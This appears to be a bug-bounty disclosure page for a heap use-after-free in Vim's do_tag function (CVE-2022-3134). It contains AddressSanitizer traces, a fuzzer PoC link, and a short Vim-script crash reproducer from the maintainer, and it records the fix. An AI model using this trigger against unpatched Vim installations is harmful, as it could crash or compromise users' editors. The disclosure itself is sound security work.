

Use After Free in function do_tag in vim/vim

0



Valid

Reported on Sep 3rd 2022

Description

Use After Free in function do_tag at vim/src/tag.c:807.

vim version

```
./vim --version
```

```
VIM - Vi IMproved 9.0 (2022 Jun 28, compiled Sep  2 2022 22:56:19)
```

```
Included patches: 1-363
```

Proof of Concept

```
./vim -u NONE -i NONE -n -m -X -Z -e -s -S /home/elva/fuzz_vim/test/poc8_hu
```

```
=====
```

```
==122823==ERROR: AddressSanitizer: heap-use-after-free on address 0x625000c0b8  
WRITE of size 4 at 0x62500000c0b8 thread T0
```

```
#0 0x55e4bcacd1c8 in do_tag /home/elva/fuzz_vim/vim/src/tag.c:807  
#1 0x55e4bc7035dc in ex_tag_cmd /home/elva/fuzz_vim/vim/src/ex_docmd.c:  
#2 0x55e4bc7032fa in ex_tag /home/elva/fuzz_vim/vim/src/ex_docmd.c:8974  
#3 0x55e4bc6de148 in do_one_cmd /home/elva/fuzz_vim/vim/src/ex_docmd.c:  
#4 0x55e4bc6d5483 in do_cmdline /home/elva/fuzz_vim/vim/src/ex_docmd.c:  
#5 0x55e4bc6d381d in do_cmdline_cmd /home/elva/fuzz_vim/vim/src/ex_docm  
#6 0x55e4bcb1fc56 in f_assert_fails /home/elva/fuzz_vim/vim/src/testing  
#7 0x55e4bc67417f in call_internal_func /home/elva/fuzz_vim/vim/src/eva  
#8 0x55e4bcb88f41 in call_func /home/elva/fuzz_vim/vim/src/userfunc.c:3  
#9 0x55e4bcb7f833 in get_func_tv /home/elva/fuzz_vim/vim/src/userfunc.c  
#10 0x55e4bcb9540a in ex_call /home/elva/fuzz_vim/vim/src/userfunc.c:55  
#11 0x55e4bc6de148 in do_one_cmd /home/elva/fuzz_vim/vim/src/ex_docmd.c:  
#12 0x55e4bc6d5483 in do_cmdline /home/elva/fuzz_vim/vim/src/ex_docmd.c:  
#13 0x55e4bca05b68 in do_source_ext /home/elva/fuzz_vim/vim/src/script1
```

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```

#14 0x55e4bca06d9d in do_source /home/elva/fuzz_vim/vim/src/scriptfile.
#15 0x55e4bca0385b in cmd_source /home/elva/fuzz_vim/vim/src/scriptfile
#16 0x55e4bca038c0 in ex_source /home/elva/fuzz_vim/vim/src/scriptfile.

#17 0x55e4bc6de148 in do_one_cmd /home/elva/fuzz_vim/vim/src/ex_docmd.c
#18 0x55e4bc6d5483 in do_cmdline /home/elva/fuzz_vim/vim/src/ex_docmd.c
#19 0x55e4bc6d381d in do_cmdline_cmd /home/elva/fuzz_vim/vim/src/ex_doc
#20 0x55e4bccdf8a6 in exe_commands /home/elva/fuzz_vim/vim/src/main.c:3
#21 0x55e4bccd83a3 in vim_main2 /home/elva/fuzz_vim/vim/src/main.c:780
#22 0x55e4bccd7c2d in main /home/elva/fuzz_vim/vim/src/main.c:432
#23 0x7f410bacf0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.
#24 0x55e4bc54462d in _start (/home/elva/fuzz_vim/vim/src/vim+0x14062d)

```

0x6250000c0b8 is located 8120 bytes inside of 9104-byte region [0x6250000c freed by thread T0 here:

```

#0 0x7f410c33540f in __interceptor_free ../../../../src/libsanitizer/as
#1 0x55e4bc544d1a in vim_free /home/elva/fuzz_vim/vim/src/alloc.c:623
#2 0x55e4bcc3fe40 in win_free /home/elva/fuzz_vim/vim/src/window.c:5281
#3 0x55e4bcc35544 in win_free_mem /home/elva/fuzz_vim/vim/src/window.c:
#4 0x55e4bcc33b7a in win_close /home/elva/fuzz_vim/vim/src/window.c:266
#5 0x55e4bc6f61e4 in ex_exit /home/elva/fuzz_vim/vim/src/ex_docmd.c:644
#6 0x55e4bc6de148 in do_one_cmd /home/elva/fuzz_vim/vim/src/ex_docmd.c:
#7 0x55e4bc6d5483 in do_cmdline /home/elva/fuzz_vim/vim/src/ex_docmd.c:
#8 0x55e4bcb85336 in call_user_func /home/elva/fuzz_vim/vim/src/userfun
#9 0x55e4bcb86584 in call_user_func_check /home/elva/fuzz_vim/vim/src/u
#10 0x55e4bcb88e38 in call_func /home/elva/fuzz_vim/vim/src/userfunc.c:
#11 0x55e4bcb876ca in call_callback /home/elva/fuzz_vim/vim/src/userfun
#12 0x55e4bcad139c in find_tagfunc_tags /home/elva/fuzz_vim/vim/src/tag
#13 0x55e4bcad321c in findtags_apply_tfu /home/elva/fuzz_vim/vim/src/ta
#14 0x55e4bcadaef1 in find_tags /home/elva/fuzz_vim/vim/src/tag.c:3145
#15 0x55e4bcacc885 in do_tag /home/elva/fuzz_vim/vim/src/tag.c:687
#16 0x55e4bc7035dc in ex_tag_cmd /home/elva/fuzz_vim/vim/src/ex_docmd.c
#17 0x55e4bc7032fa in ex_tag /home/elva/fuzz_vim/vim/src/ex_docmd.c:897
#18 0x55e4bc6de148 in do_one_cmd /home/elva/fuzz_vim/vim/src/ex_docmd.c
#19 0x55e4bc6d5483 in do_cmdline /home/elva/fuzz_vim/vim/src/ex_docmd.c
#20 0x55e4bc6d381d in do_cmdline_cmd /home/elva/fuzz_vim/vim/src/ex_doc
#21 0x55e4bcb1fc56 in f_assert_fails /home/elva/fuzz_vim/vim/src/testir
#22 0x55e4bc67417f in call_internal_func /home/elva/fuzz_vim/vim/src/ev
#23 0x55e4bcb88f41 in call_func /home/elva/fuzz_vim/vim/src/userfunc.c:
#24 0x55e4bcb7f833 in get_func_tv /home/elva/fuzz_vim/vim/src/userfunc.c:
#25 0x55e4bcb9540a in ex_call /home/elva/fuzz_vim/vim/src/userfunc.c:55
#26 0x55e4bc6d1483 in do_one_cmd /home/elva/fuzz_vim/vim/src/ex_docmd.c:

```

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```
#26 0x55e4bc6de148 in do_one_cmd /home/elva/fuzz_vim/vim/src/ex_docmd.c:148
#27 0x55e4bc6d5483 in do_cmdline /home/elva/fuzz_vim/vim/src/ex_docmd.c:148
#28 0x55e4bca05b68 in do_source_ext /home/elva/fuzz_vim/vim/src/scriptfile.c:148
#29 0x55e4bca06d9d in do_source /home/elva/fuzz_vim/vim/src/scriptfile.c:148
```

previously allocated by thread T0 here:

```
#0 0x7f410c335808 in __interceptor_malloc .././.././../src/libsanitizer/
#1 0x55e4bc544a6a in lalloc /home/elva/fuzz_vim/vim/src/alloc.c:246
#2 0x55e4bc544900 in alloc_clear /home/elva/fuzz_vim/vim/src/alloc.c:17
#3 0x55e4bcc3ee49 in win_alloc /home/elva/fuzz_vim/vim/src/window.c:50
#4 0x55e4bcc2af38 in win_split_ins /home/elva/fuzz_vim/vim/src/window.c:50
#5 0x55e4bcc297f8 in win_split /home/elva/fuzz_vim/vim/src/window.c:84
#6 0x55e4bc6f6f9a in ex_splitview /home/elva/fuzz_vim/vim/src/ex_docmd.c:148
#7 0x55e4bc6de148 in do_one_cmd /home/elva/fuzz_vim/vim/src/ex_docmd.c:148
#8 0x55e4bc6d5483 in do_cmdline /home/elva/fuzz_vim/vim/src/ex_docmd.c:148
#9 0x55e4bca05b68 in do_source_ext /home/elva/fuzz_vim/vim/src/scriptfile.c:148
#10 0x55e4bca06d9d in do_source /home/elva/fuzz_vim/vim/src/scriptfile.c:148
#11 0x55e4bca0385b in cmd_source /home/elva/fuzz_vim/vim/src/scriptfile.c:148
#12 0x55e4bca038c0 in ex_source /home/elva/fuzz_vim/vim/src/scriptfile.c:148
#13 0x55e4bc6de148 in do_one_cmd /home/elva/fuzz_vim/vim/src/ex_docmd.c:148
#14 0x55e4bc6d5483 in do_cmdline /home/elva/fuzz_vim/vim/src/ex_docmd.c:148
#15 0x55e4bc6d381d in do_cmdline_cmd /home/elva/fuzz_vim/vim/src/ex_docmd.c:148
#16 0x55e4bccdf8a6 in exe_commands /home/elva/fuzz_vim/vim/src/main.c:148
#17 0x55e4bccd83a3 in vim_main2 /home/elva/fuzz_vim/vim/src/main.c:780
#18 0x55e4bccd7c2d in main /home/elva/fuzz_vim/vim/src/main.c:432
#19 0x7f410bacf0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.2:0)
```

SUMMARY: AddressSanitizer: heap-use-after-free /home/elva/fuzz_vim/vim/src/ex_docmd.c:148, Shadow bytes around the buggy address:

```
0x0c4a7fff97c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4a7fff97d0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4a7fff97e0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4a7fff97f0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4a7fff9800: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c4a7fff9810: fd fd fd fd fd fd fd[fd]fd fd fd fd fd fd fd fd fd
0x0c4a7fff9820: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4a7fff9830: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4a7fff9840: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4a7fff9850: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
0x0c4a7fff9860: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
```

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shadow **byte** legend (one shadow **byte** represents 8 application bytes):

Addressable: 00

Partially addressable: 01 02 03 04 05 06 07

Heap left redzone: fa

Freed heap region: fd

Stack left redzone: f1

Stack mid redzone: f2

Stack right redzone: f3

Stack after **return**: f5

Stack use after scope: f8

Global redzone: f9

Global init order: f6

Poisoned by user: f7

Container overflow: fc

Array cookie: ac

Intra object redzone: bb

ASan internal: fe

Left alloca redzone: ca

Right alloca redzone: cb

Shadow gap: cc

==122823==ABORTING



poc download url: https://github.com/Janette88/vim/blob/main/poc8_huaf.dat

Impact

Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.

CVE

CVE-2022-3134

(Published)

Vulnerability Type

CWE-416: Use After Free

Severity

High (7.8)

Registry

Other

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Other

Affected Version

*

Visibility

Public

Status

Fixed

Found by

janette88

@janette88

master ▼

Fixed by



Bram Moolenaar

@brammool

maintainer

This report was seen 729 times.

We are processing your report and will contact the **vim** team within 24 hours. 3 months ago

We have contacted a member of the **vim** team and are waiting to hear back 3 months ago

Bram Moolenaar validated this vulnerability 3 months ago

I can reproduce it. The POC can be drastically simplified:

```
split any
func Mytagfunc2(pat, flags, info)
close
return [{'name': 'mytag', 'filename': 'Xtest', 'cmd': 'l'}]
endfunc
set tagfunc=Mytagfunc2
call assert_fails('tag xyz', 'E986:')
```

janette88 has been awarded the disclosure bounty ✓

The fix bounty is now up for grabs

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The researcher's credibility has increased: +7

Bram Moolenaar marked this as fixed in **9.0.0388** with commit **ccfde4** 3 months ago

Bram Moolenaar has been awarded the fix bounty 

This vulnerability will not receive a CVE 

Bram Moolenaar 3 months ago

Maintainer

Fixed with patch 9.0.0389

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